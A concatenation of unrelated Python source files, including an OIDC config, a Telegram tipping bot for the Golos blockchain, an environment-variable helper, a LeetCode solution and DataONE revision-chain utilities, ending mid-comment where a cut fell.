# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""CESNET OIDC Auth backend for OARepo"""
import os
from datetime import timedelta
from cesnet_openid_remote import CesnetOpenIdRemote
from cesnet_openid_remote.constants import OPENIDC_GROUPS_SCOPE, OPENIDC_BASE_URL
CESNET_OPENIDC_CONFIG = dict(
base_url=OPENIDC_BASE_URL,
consumer_key=os.environ.get('OPENIDC_KEY', 'MISSING_OIDC_KEY'),
consumer_secret=os.environ.get('OPENIDC_SECRET', 'MISSING_OIDC_SECRET'),
scope=f'openid email profile {OPENIDC_GROUPS_SCOPE} isCesnetEligibleLastSeen'
)
CESNET_OPENID_REMOTE_REFRESH_TIMEDELTA = timedelta(minutes=-1)
"""Default interval for refreshing user's extra data (e.g. groups)."""
CESNET_OPENID_REMOTE_GROUP_REALM = 'cesnet.cz'
"""Default realm of group attribute URNs."""
CESNET_OPENID_REMOTE_GROUP_AUTHORITY = 'perun.cesnet.cz'
"""Default authority that issues the group attribute URIs."""
CESNET_OPENID_REMOTE_SESSION_KEY = 'identity.cesnet_provides'
"""Name of session key where CESNET roles are stored."""
OAUTHCLIENT_CESNET_OPENID_GROUP_VALIDATOR = 'cesnet_openid_remote.groups.validate_group_uri'
"""Function used to validate external group URIs."""
OAUTHCLIENT_CESNET_OPENID_GROUP_PARSER = 'cesnet_openid_remote.groups.parse_group_uri'
"""Function used to parse external group URIs to (UUID, extra_data) pairs."""
OAUTHCLIENT_CESNET_OPENID_STATE_TRANSFORM = 'cesnet_openid_remote.state.transform_state_data'
"""Function used to validate external group URIs."""
OAUTHCLIENT_CESNET_OPENID_PROTECTED_ROLES = ['admin']
"""Role names that shouldn't be managed/(un)assigned to users by this extension."""
OAUTHCLIENT_REST_REMOTE_APPS = dict(
eduid=CesnetOpenIdRemote().remote_app(),
)
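# Sketch (hypothetical app factory): these values are consumed as Invenio
# application config, e.g. something like
#   app.config.from_object('cesnet_openid_remote.config')
# after which invenio-oauthclient picks up OAUTHCLIENT_REST_REMOTE_APPS.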
|
from utils import utils
from enums.enums import RtIdEnum
class ServerCryptkeyGameSerializer:
data_dict = [
{'name': 'rtid', 'n_bytes': 1, 'cast': None},
{'name': 'len', 'n_bytes': 2, 'cast': utils.bytes_to_int_little},
]
    def serialize(self, data: bytes):
        # Stub: intentionally unimplemented, so the return below is unreachable
        # until the raise is removed.
        raise Exception('Unimplemented Handler: ServerCryptkeyGameSerializer')
        return utils.serialize(data, self.data_dict)
    @classmethod
    def build(cls, key):
packet = [
{'name': __name__},
{'rtid': RtIdEnum.SERVER_CRYPTKEY_GAME},
{'key': key}
]
return packet
class ServerCryptkeyGameHandler:
def process(self, serialized, monolith, con):
raise Exception('Unimplemented Handler: ServerCryptkeyGameHandler')
|
# Copyright (C) 2020 University of Oxford
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Dict
from datetime import datetime
from utils.types import FetcherType
from abc import ABC, abstractmethod
from utils.config import config
__all__ = ('AbstractAdapter',)
logger = logging.getLogger(__name__)
class AbstractAdapter(ABC):
@staticmethod
    def check_if_gid_exists(kwargs: Dict) -> None:
if not kwargs.get('gid'):
logger.warning(
f'GID is missing for: {kwargs.get("countrycode")}, {kwargs.get("adm_area_1")}, '
f'{kwargs.get("adm_area_2")}, {kwargs.get("adm_area_3")}, please correct your data')
@staticmethod
def date_in_window(args: Dict) -> bool:
if not config.SLIDING_WINDOW_DAYS:
return True
date = args.get('date')
if isinstance(date, str):
date = datetime.strptime(date.split(' ')[0].split('T')[0], '%Y-%m-%d')
if isinstance(date, datetime):
days = (datetime.now() - date).days
if days > config.SLIDING_WINDOW_DAYS:
return False
return True
@staticmethod
def correct_table_name(table_name: str) -> str:
if config.VALIDATE_INPUT_DATA and table_name in ['epidemiology']:
return 'staging_' + table_name
return table_name
@abstractmethod
def upsert_government_response_data(self, table_name: str, **kwargs):
raise NotImplementedError()
@abstractmethod
def upsert_epidemiology_data(self, table_name: str, **kwargs):
raise NotImplementedError()
@abstractmethod
def upsert_mobility_data(self, table_name: str, **kwargs):
raise NotImplementedError()
@abstractmethod
def get_adm_division(self, countrycode: str, adm_area_1: str = None, adm_area_2: str = None,
adm_area_3: str = None):
raise NotImplementedError()
def upsert_data(self, fetcher_type: FetcherType, **kwargs):
if not self.date_in_window(kwargs):
return
table_name = self.correct_table_name(fetcher_type.value)
if fetcher_type == FetcherType.EPIDEMIOLOGY:
return self.upsert_epidemiology_data(table_name, **kwargs)
elif fetcher_type == FetcherType.MOBILITY:
return self.upsert_mobility_data(table_name, **kwargs)
elif fetcher_type == FetcherType.GOVERNMENT_RESPONSE:
return self.upsert_government_response_data(table_name, **kwargs)
        elif fetcher_type == FetcherType.WEATHER:
            # Note: upsert_weather_data is not declared abstract above; concrete
            # adapters are expected to provide it.
            return self.upsert_weather_data(table_name, **kwargs)
else:
raise NotImplementedError()
def get_latest_timestamp(self, table_name: str, source: str = None):
raise NotImplementedError()
def flush(self):
pass
def call_db_function_compare(self, source_code: str) -> bool:
return False
def call_db_function_send_data(self, source_code: str):
pass
def truncate_staging(self):
pass
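# Sketch of a minimal concrete adapter (hypothetical; real adapters persist to
# a database and also override get_latest_timestamp and friends):
#
#   class InMemoryAdapter(AbstractAdapter):
#       def upsert_government_response_data(self, table_name, **kwargs): ...
#       def upsert_epidemiology_data(self, table_name, **kwargs): ...
#       def upsert_mobility_data(self, table_name, **kwargs): ...
#       def get_adm_division(self, countrycode, adm_area_1=None,
#                            adm_area_2=None, adm_area_3=None): ...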
|
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
if __name__ == '__main__':
    str1 = input('input a string:\n')
    str2 = input('input a sub string:\n')
    ncount = str1.count(str2)
    print(ncount)
|
import os
from enum import Enum
NOT_PROVIDED = object()
class EnvException(Exception):
pass
class Environment(Enum):
"""
A simple Enum to provide consistency in how we detect and
represent the environment in which a service is running.
"""
PRODUCTION = ('prd', 'Production')
DEVELOPMENT = ('dev', 'Development')
LOCAL = ('lcl', 'Local')
TEST = ('test', 'Test')
def __init__(self, short_name, long_name):
self.short_name = short_name
self.long_name = long_name
self._searchable = {short_name.lower(), long_name.lower()}
@property
def is_deployed(self):
return self in {self.PRODUCTION, self.DEVELOPMENT}
@classmethod
def _missing_(cls, value):
"""
        Extends the default value lookup behavior,
        Environment(('prd', 'Production')), to also accept either name as a
        string (case-insensitive).
>>> assert Environment.PRODUCTION is Environment('prd') is Environment('PRODUCTION')
"""
for member in list(cls):
if value.lower() in member._searchable:
return member
return super()._missing_(value)
class Env:
def get(self, key, default=NOT_PROVIDED, required=True, coerce=NOT_PROVIDED):
try:
val = os.environ[key].strip()
except KeyError as e:
if default is not NOT_PROVIDED:
return default
if not required:
return None
raise EnvException('Missing key "{}"'.format(key)) from e
if coerce is not NOT_PROVIDED:
val = coerce(val)
return val
def get_environment(self, key, default=NOT_PROVIDED, required=True):
return self.get(key, default=default, required=required, coerce=Environment)
def get_int(self, key, default=NOT_PROVIDED, required=True):
try:
return self.get(key, default=default, required=required,
coerce=int)
except ValueError as e:
raise EnvException('Could not get int: {}'.format(e)) from e
def get_bool(self, key, default=NOT_PROVIDED, required=True):
def is_bool(val):
if val == '1':
return True
elif val == '0':
return False
else:
raise ValueError(f"{key} must be '1' or '0' (got '{val}')")
return self.get(key, default=default, required=required, coerce=is_bool)
def get_csv(self, key, default=NOT_PROVIDED, required=True):
def splitter(val):
return [s.strip() for s in val.split(',') if s.strip()]
return self.get(key, default=default, required=required,
coerce=splitter)
def get_tokens(self, key, default=NOT_PROVIDED, required=True):
def splitter(val):
return [s.strip() for s in val.split() if s.strip()]
return self.get(key, default=default, required=required,
coerce=splitter)
def get_key(self, guard_type, key, required=True):
BEGIN_GUARD = '-----BEGIN {}-----'.format(guard_type)
END_GUARD = '-----END {}-----'.format(guard_type)
LINE_LENGTH = 64
val = self.get(key, required=required)
if not val:
return val
# ensure key begins and ends with guards
if not val.startswith(BEGIN_GUARD) or not val.endswith(END_GUARD):
raise EnvException('Key must have proper BEGIN and END guards')
# if val already has newlines, we assume it's in the right format
if '\n' in val:
return val
val = val[len(BEGIN_GUARD):-len(END_GUARD)]
key_lines = [BEGIN_GUARD]
while val:
key_lines.append(val[:LINE_LENGTH])
val = val[LINE_LENGTH:]
key_lines.append(END_GUARD)
return '\n'.join(key_lines)
_default = Env() # no prefix for module-based use
get = _default.get
get_bool = _default.get_bool
get_csv = _default.get_csv
get_environment = _default.get_environment
get_int = _default.get_int
get_key = _default.get_key
get_tokens = _default.get_tokens
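if __name__ == '__main__':
    # Self-contained demo with hypothetical keys; values are injected here so
    # the example does not depend on the real environment.
    os.environ.setdefault('DEMO_PORT', '8080')
    os.environ.setdefault('DEMO_ENV', 'prd')
    assert get_int('DEMO_PORT') == 8080
    assert get_environment('DEMO_ENV') is Environment.PRODUCTION
    assert get('DEMO_MISSING', default='fallback') == 'fallback'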
|
# -*- coding: utf-8 -*-
import json
from pprint import pprint
from time import sleep, time
from ttgbase.api import Api, Menu
import menu
from tgolosbase.api import Api as GolosApi
from lib.golos import Golos, Claim
from storage import token, maska, golos_reg
class Tip23(Golos, Claim):
def __init__(self):
self.token = token
self.maska = maska
self.golos_reg_bot = golos_reg["account"]
self.golos_reg_wif = golos_reg["wif"]
self.golos_reg_fee = golos_reg["fee"]
        # Load the bot's message phrases
import msg as bot_msg
self.bot_msg = bot_msg
self.tg = Api(self.token, report=True)
self.prepare_commands()
self.golos = GolosApi(report=True)
self.bot_menu = Menu(menu.menu, self.commands, self.tg)
##### ##### TG COMMANDS ##### #####
def prepare_commands(self):
self.tg.commands["private_text"] = self.private_text
self.tg.commands["private_entities"] = self.private_entities
self.tg.commands["chat_text"] = self.chat_text
self.tg.commands["chat_entities"] = self.chat_entities
self.tg.commands["chat_reply"] = self.chat_reply
self.commands = {
"help:Intro": self.help_intro,
"help:Reg": self.help_reg,
"golossign": self.golossign,
"goloslogin": self.goloslogin,
"goloswallet": self.goloswallet,
"golosclaimlogin": self.golosclaimlogin,
"golosclaimwif": self.golosclaimwif,
"golosclaim:Info": self.golosclaiminfo,
"golosclaim:Delete": self.golosclaiminfo,
"golosclaimdel": self.golosclaimdel,
"golos:Info": self.golosinfo,
"golosinfo:ClaimNow": self.golosclaimnow,
"golosreg": self.golosreg,
"golosregYN:Yes": self.golosregyes,
"golosdelYN:Yes": self.golosdelyes,
"language:Russian": self.language,
"language:English": self.language,
"report:On": self.report,
"report:Off": self.report,
}
##### ##### CHAT ##### #####
def private_text(self, message):
self.bot_menu.resolve(message)
def private_entities(self, message):
self.bot_menu.resolve(message)
pass
def chat_text(self, message):
#print(message["chat"]["id"], message["text"])
#tg.send_message(message["chat"]["id"], 'get text')
pass
def chat_entities(self, message):
user_id, chat_id, lng = self.get_params_chat(message)
cmd = message["text"]
cmd_all = ['/golos+', '/golos-']
if (user_id in self.bot_menu.users_tg) and (cmd in cmd_all):
db = self.bot_menu.users_tg[user_id]
print(self.maska, 'CMD', chat_id, user_id, cmd)
if cmd in ['/golos+', '/golos-']:
target_account, target_chat, asset = 'golosaccount', 'goloschat', 'GOLOS'
if cmd == '/golos+':
initiator = db.get(target_account, None)
if initiator:
account, wif = initiator.split(':')
db.setdefault(target_chat, [])
if chat_id not in db[target_chat]:
tx = self.golos.get_accounts([account])[0]
try:
msg = ' '.join([' +' + str(int(tx["TIP"])), asset])
                            except Exception:
msg = ' error data'
db[target_chat].append(chat_id)
self.tg.send_message(chat_id, self.bot_msg.InvestorBecome[lng] + msg, delete=True)
self.bot_menu.save()
else:
self.tg.send_message(chat_id, self.bot_msg.InvestorAlready[lng], delete=True)
else:
self.tg.send_message(chat_id, self.bot_msg.MustConnectAccount[lng], delete=True)
if cmd == '/golos-':
chat_list = db.get(target_chat, [])
if chat_id in chat_list:
db[target_chat].remove(chat_id)
self.tg.send_message(chat_id, self.bot_msg.InvestorWithdraw[lng] + asset, delete=True)
self.bot_menu.save()
def chat_reply(self, message):
user_id, chat_id, lng = self.get_params_chat(message)
text = message["text"]
user_name = '@' + str(message["from"].get("username", ''))
message_id = str(message["message_id"])
title = str(message["chat"]["title"])
reply_id = str(message["reply_to_message"]["from"]["id"])
reply_username = '@' + str(message["reply_to_message"]["from"].get("username", ''))
reply_text = str(message["reply_to_message"].get("text", ''))
is_bot = str(message["reply_to_message"]["from"]["is_bot"])
k_like, amount = text.count('+', 0, 5), 0
if 'tip' == text[:3].lower():
try:
amount = int(text.split()[0].lower().replace('tip', ''))
            except Exception:
amount = 1
        flag_for_del = k_like > 0 and len(text) <= 5
if flag_for_del:
payload = [chat_id, message_id, self.tg.DEL_DELAY]
self.tg.delete_message(payload)
        #if (k_like > 0) and (user_id != reply_id) and (str(is_bot) == 'False'): # If there is at least one +, no self-tip, and the target is not a bot
        if (k_like > 0 or amount > 0) and (str(is_bot) == 'False'): # TEST: self-tips allowed for now; requires at least one + or an explicit amount, and the target must not be a bot
            print(self.maska, user_id, reply_id, k_like, amount)
            if user_id in self.bot_menu.users_tg and reply_id in self.bot_menu.users_tg: # If both users are in the database
                flag = False # Tracks whether the sender is an investor in any relevant chat
reports = []
for target in ['golos']:
state_acc, target_chat, wallet_acc = target + 'account', target + 'chat', target + 'wallet'
chat_list = self.bot_menu.users_tg[user_id].get(target_chat, [])
if chat_id in chat_list:
flag = True
asset_account = self.bot_menu.users_tg[user_id].get(state_acc, None)
asset_account_for_donate = self.bot_menu.users_tg[reply_id].get(wallet_acc, None)
                        if asset_account and asset_account_for_donate: # If both accounts are registered
account, wif = asset_account.split(':')
account_for_donate = asset_account_for_donate
report = None
if 'golos' == target:
lines, comment = text.split(), ''
if len(lines) >= 2: comment = ' '.join(lines[1:])
report = self.golos_donate(account, k_like, title, reply_text, account_for_donate, wif, amount=amount, comment=comment)
if report:
reports.append(report)
                        elif asset_account and (not asset_account_for_donate): # If there is no one to donate to
msg = self.bot_msg.NoProfileForDonate[lng] + ' ' + target.upper()
self.tg.send_message(chat_id, msg, delete = True)
for amount, report in reports:
# report
msg = ''.join([' +', amount, report])
self.tg.send_message(chat_id, reply_username + msg, delete = True)
if self.bot_menu.users_tg[user_id].get("report", True):
self.tg.send_message(user_id, 'donate to ' + reply_username + msg)
if self.bot_menu.users_tg[reply_id].get("report", True):
self.tg.send_message(reply_id, 'received from ' + user_name + msg)
if not flag:
self.tg.send_message(chat_id, self.bot_msg.InvestorNot[lng], delete = True)
##### ##### HELP ##### #####
def help_intro(self, message):
msg = 'https://golos.in/ru--blokcheijn/@ksantoprotein/tip23bot-telegramm-bot-dlya-laikov-avtokleminga-i-igr'
self.tg.send_message(message["chat"]["id"], msg)
def help_reg(self, message):
msg = 'https://golos.in/ru--golos/@ksantoprotein/thallid-pom-bot-instrukciya-registraciya'
self.tg.send_message(message["chat"]["id"], msg)
##### ##### GET ##### #####
def get_language(self, user_id):
if user_id in self.bot_menu.users_tg:
lng = self.bot_menu.users_tg[user_id].get("language", 'Russian')
else:
lng = 'Russian'
return lng
def get_chats(self, chat_list):
chats = []
for chat_id in chat_list:
tx = self.tg.getChat(str(chat_id))
if tx:
chat = ''.join(['@', tx.get("username", ''), ':', tx.get("title", '')])
chats.append(chat)
else:
print('error in chat', chat_id)
chats.append('hidden')
return chats
def get_params_message(self, message, type):
user_id = str(message["chat"]["id"])
lng = self.get_language(user_id)
keyboard = self.bot_menu.state[type]["keyboard"]
db = self.bot_menu.users_tg[user_id]
return([user_id, lng, keyboard, db])
def get_params_chat(self, message):
user_id = str(message["from"]["id"])
chat_id = str(message["chat"]["id"])
lng = self.get_language(user_id)
#db = self.bot_menu.users_tg[user_id]
return([user_id, chat_id, lng])
##### ##### ##### ##### #####
def language(self, message):
lng = message["text"]
user_id = str(message["chat"]["id"])
if lng in ['Russian', 'English']:
self.bot_menu.users_tg[user_id]["language"] = lng
def report(self, message):
type_report = True if message["text"] == 'On' else False
user_id = str(message["chat"]["id"])
self.bot_menu.users_tg[user_id].setdefault("report", True)
self.bot_menu.users_tg[user_id]["report"] = type_report
bot = Tip23()
bot.tg.run()
while True:
print('check claim')
bot.check_claim()
sleep(60*10)
#admin = input()
#if admin == 'exit':
# break
#else:
# print(bot.maska)
|
class APIError(Exception):
pass
class MultipleRowsError(Exception):
pass
class DoesNotExistError(Exception):
pass
class OperationalError(Exception):
pass
class FetchError(Exception):
def __init__(self, error):
super().__init__()
self.error = error
class TimeoutError(Exception):
"""Raised when a connection pool times out on getting a connection."""
class ConnectionError(Exception):
pass
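# Usage sketch: callers are expected to wrap lower-level failures, e.g.
#   try:
#       rows = pool.fetch(query)   # hypothetical call
#   except OSError as exc:
#       raise FetchError(exc) from exc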
|
from collections import defaultdict
from typing import List
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
complement_dict = defaultdict(int)
for i, num in enumerate(nums):
if target - num in complement_dict:
return [complement_dict[target - num], i]
complement_dict[num] = i
"""
Runtime O(N)
Space complexity O(N)
Runtime: 48 ms, faster than 79.33% of Python3 online submissions for Two Sum.
Memory Usage: 14.3 MB, less than 53.95% of Python3 online submissions for Two Sum.
"""
|
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for manipulating revision chains in the database."""
import d1_common.types.exceptions
import d1_gmn.app
import d1_gmn.app.did
import d1_gmn.app.model_util
import d1_gmn.app.models
def create_or_update_chain(pid, sid, obsoletes_pid, obsoleted_by_pid):
chain_model = _get_chain_by_pid(pid)
if chain_model:
_set_chain_sid(chain_model, sid)
else:
_add_sciobj(pid, sid, obsoletes_pid, obsoleted_by_pid)
_update_sid_to_last_existing_pid_map(pid)
def delete_chain(pid):
pid_to_chain_model = d1_gmn.app.models.ChainMember.objects.get(pid__did=pid)
chain_model = pid_to_chain_model.chain
pid_to_chain_model.delete()
if not d1_gmn.app.models.ChainMember.objects.filter(chain=chain_model).exists():
if chain_model.sid:
# Cascades back to chain_model.
d1_gmn.app.models.IdNamespace.objects.filter(
did=chain_model.sid.did
).delete()
else:
chain_model.delete()
def cut_from_chain(sciobj_model):
"""Remove an object from a revision chain.
The object can be at any location in the chain, including the head or tail.
Preconditions:
- The object with the pid is verified to exist and to be a member of an
revision chain. E.g., with:
d1_gmn.app.views.asserts.is_existing_object(pid)
d1_gmn.app.views.asserts.is_in_revision_chain(pid)
Postconditions:
- The given object is a standalone object with empty obsoletes, obsoletedBy and
seriesId fields.
- The previously adjacent objects in the chain are adjusted to close any gap that
was created or remove dangling reference at the head or tail.
- If the object was the last object in the chain and the chain has a SID, the SID
reference is shifted over to the new last object in the chain.
"""
if _is_head(sciobj_model):
old_pid = sciobj_model.obsoletes.did
_cut_head_from_chain(sciobj_model)
elif _is_tail(sciobj_model):
old_pid = sciobj_model.obsoleted_by.did
_cut_tail_from_chain(sciobj_model)
else:
old_pid = sciobj_model.obsoleted_by.did
_cut_embedded_from_chain(sciobj_model)
_update_sid_to_last_existing_pid_map(old_pid)
def get_all_pid_by_sid(sid):
return [c.pid.did for c in _get_all_chain_member_queryset_by_sid(sid)]
# def set_revision(pid, obsoletes_pid=None, obsoleted_by_pid=None):
# sciobj_model = d1_gmn.app.util.get_sci_model(pid)
# set_revision_links(sciobj_model, obsoletes_pid, obsoleted_by_pid)
# sciobj_model.save()
def resolve_sid(sid):
"""Get the PID to which the ``sid`` currently maps.
Preconditions:
- ``sid`` is verified to exist. E.g., with d1_gmn.app.views.asserts.is_sid().
"""
return d1_gmn.app.models.Chain.objects.get(sid__did=sid).head_pid.did
def get_sid_by_pid(pid):
"""Given the ``pid`` of the object in a chain, return the SID for the chain.
Return None if there is no SID for the chain. This operation is also valid
for standalone objects which may or may not have a SID.
This is the reverse of resolve.
All known PIDs are associated with a chain.
Preconditions:
- ``pid`` is verified to exist. E.g., with
d1_gmn.app.views.asserts.is_existing_object().
"""
return d1_gmn.app.did.get_did_by_foreign_key(_get_chain_by_pid(pid).sid)
def set_revision_links(sciobj_model, obsoletes_pid=None, obsoleted_by_pid=None):
if obsoletes_pid:
sciobj_model.obsoletes = d1_gmn.app.did.get_or_create_did(obsoletes_pid)
_set_revision_reverse(sciobj_model.pid.did, obsoletes_pid, is_obsoletes=False)
if obsoleted_by_pid:
sciobj_model.obsoleted_by = d1_gmn.app.did.get_or_create_did(obsoleted_by_pid)
_set_revision_reverse(sciobj_model.pid.did, obsoleted_by_pid, is_obsoletes=True)
sciobj_model.save()
def is_obsoletes_pid(pid):
"""Return True if ``pid`` is referenced in the obsoletes field of any object.
This will return True even if the PID is in the obsoletes field of an object that
does not exist on the local MN, such as replica that is in an incomplete chain.
"""
return d1_gmn.app.models.ScienceObject.objects.filter(obsoletes__did=pid).exists()
def is_obsoleted_by_pid(pid):
"""Return True if ``pid`` is referenced in the obsoletedBy field of any object.
This will return True even if the PID is in the obsoletes field of an object that
does not exist on the local MN, such as replica that is in an incomplete chain.
"""
return d1_gmn.app.models.ScienceObject.objects.filter(
obsoleted_by__did=pid
).exists()
def is_revision(pid):
"""Return True if ``pid`` is referenced in the obsoletes or obsoletedBy field of any
object.
This will return True even if the PID is in the obsoletes field of an object that
does not exist on the local MN, such as replica that is in an incomplete chain.
"""
return is_obsoletes_pid(pid) or is_obsoleted_by_pid(pid)
def _add_sciobj(pid, sid, obsoletes_pid, obsoleted_by_pid):
is_added = _add_to_chain(pid, sid, obsoletes_pid, obsoleted_by_pid)
if not is_added:
# if not obsoletes_pid and not obsoleted_by_pid:
_add_standalone(pid, sid)
# else:
def _add_standalone(pid, sid):
# assert_sid_unused(sid)
_create_chain(pid, sid)
def _add_to_chain(pid, sid, obsoletes_pid, obsoleted_by_pid):
_assert_sid_is_in_chain(sid, obsoletes_pid)
_assert_sid_is_in_chain(sid, obsoleted_by_pid)
obsoletes_chain_model = _get_chain_by_pid(obsoletes_pid)
obsoleted_by_chain_model = _get_chain_by_pid(obsoleted_by_pid)
sid_chain_model = _get_chain_by_sid(sid) if sid else None
chain_model = obsoletes_chain_model or obsoleted_by_chain_model or sid_chain_model
if not chain_model:
return False
if obsoletes_chain_model and obsoletes_chain_model != chain_model:
_merge_chains(chain_model, obsoletes_chain_model)
if obsoleted_by_chain_model and obsoleted_by_chain_model != chain_model:
_merge_chains(chain_model, obsoleted_by_chain_model)
_add_pid_to_chain(chain_model, pid)
_set_chain_sid(chain_model, sid)
return True
def _merge_chains(chain_model_a, chain_model_b):
"""Merge two chains.
For use when it becomes known that two chains that were created separately
actually are separate sections of the same chain
E.g.:
- A obsoleted by X is created. A has no SID. X does not exist yet. A chain is
created for A.
- B obsoleting Y is created. B has SID. Y does not exist yet. A chain is created
for B.
- C obsoleting X, obsoleted by Y is created. C tells us that X and Y are in the
same chain, which means that A and B are in the same chain. At this point, the
two chains need to be merged. Merging the chains causes A to take on the SID of
B.
"""
_set_chain_sid(
chain_model_a, d1_gmn.app.did.get_did_by_foreign_key(chain_model_b.sid)
)
for member_model in _get_all_chain_member_queryset_by_chain(chain_model_b):
member_model.chain = chain_model_a
member_model.save()
chain_model_b.delete()
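# Worked example of the merge above (hypothetical chains): if chain 1 holds {A}
# with no SID and chain 2 holds {B} with SID "s1", then
# _merge_chains(chain_1, chain_2) sets chain 1's SID to "s1", moves B into
# chain 1, and deletes the now empty chain 2.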
def _add_pid_to_chain(chain_model, pid):
chain_member_model = d1_gmn.app.models.ChainMember(
chain=chain_model, pid=d1_gmn.app.did.get_or_create_did(pid)
)
chain_member_model.save()
def _set_chain_sid(chain_model, sid):
"""Set or update SID for chain.
If the chain already has a SID, ``sid`` must either be None or match the existing
SID.
"""
if not sid:
return
if chain_model.sid and chain_model.sid.did != sid:
raise d1_common.types.exceptions.ServiceFailure(
0,
"Attempted to modify existing SID. "
'existing_sid="{}", new_sid="{}"'.format(chain_model.sid.did, sid),
)
chain_model.sid = d1_gmn.app.did.get_or_create_did(sid)
chain_model.save()
def _assert_sid_is_in_chain(sid, pid):
if not sid or not pid:
return
chain_model = _get_chain_by_pid(pid)
if not chain_model or not chain_model.sid:
return
if chain_model.sid.did != sid:
raise d1_common.types.exceptions.ServiceFailure(
0,
"Attempted to create object in chain with non-matching SID. "
'existing_sid="{}", new_sid="{}"'.format(chain_model.sid.did, sid),
)
def _find_head_or_latest_connected(pid, last_pid=None):
"""Find latest existing sciobj that can be reached by walking towards the head from
``pid``
If ``pid`` does not exist, return None. If chain is connected all the way to head
and head exists, return the head. If chain ends in a dangling obsoletedBy, return
the last existing object.
"""
try:
sci_model = d1_gmn.app.model_util.get_sci_model(pid)
except d1_gmn.app.models.ScienceObject.DoesNotExist:
return last_pid
if sci_model.obsoleted_by is None:
return pid
return _find_head_or_latest_connected(sci_model.obsoleted_by.did, pid)
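# Example: given a chain A -> B -> C where C has not yet been created (B has a
# dangling obsoletedBy), _find_head_or_latest_connected("A") returns "B", the
# last object that actually exists locally.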
def _get_chain_by_pid(pid):
"""Find chain by pid.
Return None if not found.
"""
try:
return d1_gmn.app.models.ChainMember.objects.get(pid__did=pid).chain
except d1_gmn.app.models.ChainMember.DoesNotExist:
pass
def _get_chain_by_sid(sid):
"""Return None if not found."""
try:
return d1_gmn.app.models.Chain.objects.get(sid__did=sid)
except d1_gmn.app.models.Chain.DoesNotExist:
pass
def _update_sid_to_last_existing_pid_map(pid):
"""Set chain head PID to the last existing object in the chain to which ``pid``
    belongs. If a SID has been set for the chain, it resolves to the chain head PID.
    Intended to be called in MNStorage.delete() and by other chain manipulation code.
Preconditions:
- ``pid`` must exist and be verified to be a PID.
d1_gmn.app.views.asserts.is_existing_object()
"""
last_pid = _find_head_or_latest_connected(pid)
chain_model = _get_chain_by_pid(last_pid)
if not chain_model:
return
chain_model.head_pid = d1_gmn.app.did.get_or_create_did(last_pid)
chain_model.save()
def _create_chain(pid, sid):
"""Create the initial chain structure for a new standalone object. Intended to be
called in MNStorage.create().
Preconditions:
- ``sid`` must be verified to be available to be assigned to a new standalone
object. E.g., with is_valid_sid_for_new_standalone().
"""
chain_model = d1_gmn.app.models.Chain(
# sid=d1_gmn.app.models.did(sid) if sid else None,
head_pid=d1_gmn.app.did.get_or_create_did(pid)
)
chain_model.save()
_add_pid_to_chain(chain_model, pid)
_set_chain_sid(chain_model, sid)
return chain_model
# def _get_or_create_chain_for_pid(pid):
# try:
# return d1_gmn.app.models.ChainMember.objects.get(pid__did=pid).chain
# except d1_gmn.app.models.ChainMember.DoesNotExist:
# return _create_chain(pid, None)
def _map_sid_to_pid(chain_model, sid, pid):
if sid is not None:
chain_model.sid = d1_gmn.app.did.get_or_create_did(sid)
chain_model.head_pid = d1_gmn.app.did.get_or_create_did(pid)
chain_model.save()
def _get_all_chain_member_queryset_by_sid(sid):
return d1_gmn.app.models.ChainMember.objects.filter(
chain=d1_gmn.app.models.Chain.objects.get(sid__did=sid)
)
def _get_all_chain_member_queryset_by_chain(chain_model):
return d1_gmn.app.models.ChainMember.objects.filter(chain=chain_model)
def _cut_head_from_chain(sciobj_model):
new_head_model = d1_gmn.app.model_util.get_sci_model(sciobj_model.obsoletes.did)
new_head_model.obsoleted_by = None
sciobj_model.obsoletes = None
sciobj_model.save()
new_head_model.save()
def _cut_tail_from_chain(sciobj_model):
new_tail_model = d1_gmn.app.model_util.get_sci_model(sciobj_model.obsoleted_by.did)
new_tail_model.obsoletes = None
sciobj_model.obsoleted_by = None
sciobj_model.save()
new_tail_model.save()
def _cut_embedded_from_chain(sciobj_model):
prev_model = d1_gmn.app.model_util.get_sci_model(sciobj_model.obsoletes.did)
next_model = d1_gmn.app.model_util.get_sci_model(sciobj_model.obsoleted_by.did)
prev_model.obsoleted_by = next_model.pid
next_model.obsoletes = prev_model.pid
sciobj_model.obsoletes = None
sciobj_model.obsoleted_by = None
sciobj_model.save()
prev_model.save()
next_model.save()
def _is_head(sciobj_model):
return sciobj_model.obsoletes and not sciobj_model.obsoleted_by
def _is_tail(sciobj_model):
return sciobj_model.obsoleted_by and not sciobj_model.obsoletes
def _set_revision_reverse(to_pid, from_pid, is_obsoletes):
try:
sciobj_model = d1_gmn.app.model_util.get_sci_model(from_pid)
except d1_gmn.app.models.ScienceObject.DoesNotExist:
return
if not d1_gmn.app.did.is_existing_object(to_pid):
return
did_model = d1_gmn.app.did.get_or_create_did(to_pid)
if is_obsoletes:
sciobj_model.obsoletes = did_model
else:
sciobj_model.obsoleted_by = did_model
sciobj_model.save()
# def assert_sid_unused(sid):
# if not sid:
# return
# if find_chain_by_sid(sid):
# raise d1_common.types.exceptions.ServiceFailure(
# 0, u'Attempted to create standalone object with SID already in use. '
# 'sid="{}"'.format(sid)
# )
# def upd_sid_resolve(pid, sid=None, obsoletes_pid=None, obsoleted_by_pid=None):
# """Set SID to resolve to the newest object that exists locally for a chain"""
#
# last_pid = find_head_or_latest_connected(pid)
# def has_chain(pid):
# return d1_gmn.app.models.ChainMember.objects.filter(pid__did=pid).exists()
# def create_chain(sid, pid):
# """Create the initial chain structure for a new standalone object. Intended to
# be called in MNStorage.create().
#
# Preconditions:
